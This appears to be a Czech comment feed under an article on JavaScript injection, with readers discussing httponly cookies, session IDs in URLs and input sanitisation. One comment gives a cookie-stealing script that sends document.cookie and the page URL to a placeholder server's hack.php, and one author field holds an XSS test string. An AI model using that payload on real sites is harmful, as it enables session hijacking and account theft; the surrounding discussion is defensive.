Od: .
... a nebo prostě cookie v javascriptu zakázat. document.cookie prostě nebude ani existovat. http://php.net/manual/en/function.setcookie.php
View ArticleOd: Martin Kruliš
I když vypnete cookies, stále je tu problém, že se musí někde ukládat nějaký identifikátor relace. Aplikace to typicky řeší tak, že se začne sessionID předávat v URL, ke kterému má JS stejně snadný...
View ArticleOd: .
Evidentně jsi nepochopil, co tím prvním příspěvkem bylo myšleno. Cookies budou zapnuté, jen nebudou přístupné přes JS. Přečti si to ještě jednou.
View ArticleOd: Martin Kruliš
Aha. Teď už jsem vaši připomínku pochopil. Ano, to je také pěkný způsob prevence, pokud máte k dispozici PHP verze 5.2.0 a novější. Bohužel to ale nemusí podporovat všechny prohlížeče (httponly příznak...
View ArticleOd: alert('Ahoj');//Pokud vidíte tento text, něco se nepovedlo.
Bezpečnost webových aplikací je velmi důležitá. Ve článku si ukážeme několik útoku typu Javascript Injection a vysvětlíme, jak se jim bránit.
View ArticleOd: Marek
var url = "http://mujserver/hack.php?cookies=" + encodeURIComponent(document.cookie) + '&url=' + encodeURIComponent(location.href); location.replace(url);
View ArticleOd: Martin Tauchman
Dobrý den. Měl bych jednu otázku ohledně bezpečnosti. Hledám to všude možně na netu a zatím bez úspěchu. Problém je tenhle: Dozvěděl jsem se, že JS funkce či ostatně všechny metody se dají spouštět...
View ArticleOd: Jan Mikoláš
Dobrý den p. Martin Tauchman, zabýval jsem se v minulosti bezpečnosti webových aplikací. Nevím o tom, že pokud jsou vstupy správně ošetřeny a dbáte taktéž na HTML, že by se dal vůbec vykonávat nějaký...
View Article
